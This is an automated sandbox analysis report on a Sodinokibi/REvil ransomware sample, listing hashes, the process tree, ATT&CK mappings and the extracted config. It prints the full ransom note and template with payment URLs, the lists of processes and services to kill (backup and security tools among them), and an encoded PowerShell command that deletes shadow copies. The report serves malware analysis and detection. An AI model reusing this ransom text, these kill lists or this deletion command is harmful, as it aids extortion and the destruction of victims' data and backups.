Analysis

  • max time kernel
    144s
  • max time network
    171s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 02:24

General

  • Target

    2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe

  • Size

    207KB

  • MD5

    8617cf6577b2020b9251a898a98308af

  • SHA1

    c4d7436ab085a6113c4d77b8765504d42a66aece

  • SHA256

    2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50

  • SHA512

    1b11cd0de765f97be892cbd8b3d244dd7fd226af2c9f8ddd523aca293c80ca22ec437204ea7f018ca35d9c2cfa2f270c928c5098db5184a8640204a610bb5426

Malware Config

Extracted

Path

C:\u4qw07161b-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension u4qw07161b. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/36728C38FD7409E1
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/36728C38FD7409E1
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form: Key: lO4o3glkY3NTzLhyqNQKHH0157BC8j023pze6gnKDDxk/oco9vMSz58mmhtNMnHx HyUWdjhvTLuWTIP2+h0W9Z5yJLB2vMezB0RFmjrcOcEF5inBFshlDTvoSeLyITYE sdN0fjBwZfvSi6q/cQjDlPKz3teN2/Mn/6aNTED+ab6QLCE7ekQ5/wY8rBXqZ4MN iz6vECTVn8eSgmRCHEyl8JcMkEU/mab5+1YBkk12DhkFwIj1gtbZSMlKGPlJ+w8f F0RvRgVDpIVilIHLgYKNZ4uAR/mt9xe32wOPYnOuAkNMjrLQvdH6x/SmYaWWxcMY HaYiYvX/5gCBbq5uiBPViJ5CrXIdXTOK1RPPLiSRvJnF1FIm+wUpRXKz31+vS3w7 IGfAUsFJkMKqD1OJJ+1i56Qg69EDLQlijMRMjQ4HVjIOaAQStKrWRofCoSZ7kEQ7 CvSgAPJTvVr4bDGzpEXrvoFZ/YqGQjIgRp42hmd0D3pHYCR/YFvh8mWt70NpfiUs plBy0B62PzTUZreU4+kVIjSGXpVB8hhDXEYiZ6mx8nO4POuUcuOldBnubXoOPRV6 wvR22jR05z1fHVWBi/swXoUT6+ntN4S1AB48z7JbOa+E+V7XHli0j8xQSewE6LzP +ZjyeqxMA8NZP/yxA4aWWSMwUVk2N7Q0SxYPzeXJze4CmfmkOP05HB49haJ/2iHs 4QyXGnpcvSesNT/RWLgpI8IkqUdkB4TANbR+5g1V0+ZOpIpScpmjtPjRV2HRqk4F C0rxiVbVchHWXclN05MLR57UclvYciK4Eaxvwyig1H9iXSauxJ8zP6CPgNOOrdjA fGOCZU/9X3+aeLLl8tbn3llunGaRgovJ7Dxk9o6Koognu+5tmHVmcDbm9CJzdaAi RczXbuG2ItgXfW9QRX2SL0E2qhHeasf0LA3v4m88nDf/kcK6qE/O8H68ffLpnsGs //bG9ZgqyWgdGcuvW/nvNcKleenGyqBeRb+y6mDC9ynGtqiCOoWAacg3h1b9ZjBV eHY12f4Zc1WmdC979Nc7mKTVPGaMM9Dz5naXJi+ZRDTUH9hTF+U+KvAwcsMJXIBU +fFmL8pVjUpGXw125Sh7U2CkNFXBu4zz1uoVUP/+F0n+kgrTX3+bhHvC1yyWtzpW q06ixHqanyJms9cxP4Uq4506IXZniga4lmh735yUqrDz0vPK+Fp6dToes3VvQHzc 2KtAaA9Vf/OWgA+rtwhc75i/R+l5W1H4FYOOSkkUCI7cNRbcCS4QLHE3/O6rA8NS tfuh68qmSXF0R3BL9ixhbQ5JlKZeuL7rb7xBESlcUFs= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/36728C38FD7409E1

http://decryptor.cc/36728C38FD7409E1

Extracted

Family

sodinokibi

Botnet

$2a$10$maSqYzCs2s.gezYwrFOoJuI4SIRqDq0fr0z6iKBeb4EdgQpwYnYjq

Campaign

3385

C2


Attributes
  • net

    true

  • pid

    $2a$10$maSqYzCs2s.gezYwrFOoJuI4SIRqDq0fr0z6iKBeb4EdgQpwYnYjq

  • prc

    thunderbird

    thebat

    msaccess

    mydesktopqos

    ocomm

    ocautoupds

    outlook

    xfssvccon

    wordpad

    encsvc

    excel

    agntsvc

    sql

    winword

    isqlplussvc

    powerpnt

    ocssd

    dbeng50

    synctime

    visio

    sqbcoreservice

    mspub

    tbirdconfig

    steam

    dbsnmp

    onenote

    oracle

    firefox

    infopath

    mydesktopservice

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===---
    [+] Whats Happen? [+]
    Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
    [+] What guarantees? [+]
    Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
    [+] How to get access on website? [+]
    You have two ways:
    1) [Recommended] Using a TOR browser!
    a) Download and install TOR browser from this site: https://torproject.org/
    b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
    2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
    a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
    b) Open our secondary website: http://decryptor.cc/{UID}
    Warning: secondary website can be blocked, thats why first variant much better and more available.
    When you open our website, put the following data in the input form:
    Key: {KEY}
    -----------------------------------------------------------------------------------------
    !!! DANGER !!!
    DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
    !!! !!! !!!
    ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
    !!! !!! !!!

  • sub

    3385

  • svc

    veeam

    backup

    vss

    sql

    memtas

    svc$

    mepocs

    sophos

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 16 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe
    "C:\Users\Admin\AppData\Local\Temp\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe"
    1⤵
    • Modifies system executable filetype association
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:844
    • C:\Users\Admin\AppData\Local\Temp\3582-490\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Adds Run key to start application
      • Enumerates connected drives
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:468
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:572
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:1816
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:952

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence
      • Change Default File Association (T1042): 1
      • Registry Run Keys / Startup Folder (T1060): 1

    Defense Evasion
      • Modify Registry (T1112): 4
      • Install Root Certificate (T1130): 1

    Credential Access
      • Credentials in Files (T1081): 1

    Discovery
      • Query Registry (T1012): 1
      • Peripheral Device Discovery (T1120): 1
      • System Information Discovery (T1082): 2

    Collection
      • Data from Local System (T1005): 1

    Impact
      • Defacement (T1491): 1

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe
      MD5

      340b6f816bfdcfcb466cfc126c976844

      SHA1

      e2e3adfcf621166a9f5bb7ee9795b7914cda2095

      SHA256

      3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57

      SHA512

      3e729878fe7ae2ea2f025d71d78226ddb5930b791143eb8c4ba4a7589d5944e5b0e37e8ffe1ea4983bbc66c71587e3a4b158b3e8a2b71ccbed2889c4778962f9

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

    • \Users\Admin\AppData\Local\Temp\3582-490\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe
      MD5

      340b6f816bfdcfcb466cfc126c976844

      SHA1

      e2e3adfcf621166a9f5bb7ee9795b7914cda2095

      SHA256

      3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57

      SHA512

      3e729878fe7ae2ea2f025d71d78226ddb5930b791143eb8c4ba4a7589d5944e5b0e37e8ffe1ea4983bbc66c71587e3a4b158b3e8a2b71ccbed2889c4778962f9

    • memory/572-59-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp
      Filesize

      8KB

    • memory/572-60-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
      Filesize

      11.4MB

    • memory/572-61-0x0000000002310000-0x0000000002312000-memory.dmp
      Filesize

      8KB

    • memory/572-62-0x0000000002312000-0x0000000002314000-memory.dmp
      Filesize

      8KB

    • memory/572-63-0x0000000002314000-0x0000000002317000-memory.dmp
      Filesize

      12KB

    • memory/572-64-0x000000000231B000-0x000000000233A000-memory.dmp
      Filesize

      124KB

    • memory/844-54-0x0000000076151000-0x0000000076153000-memory.dmp
      Filesize

      8KB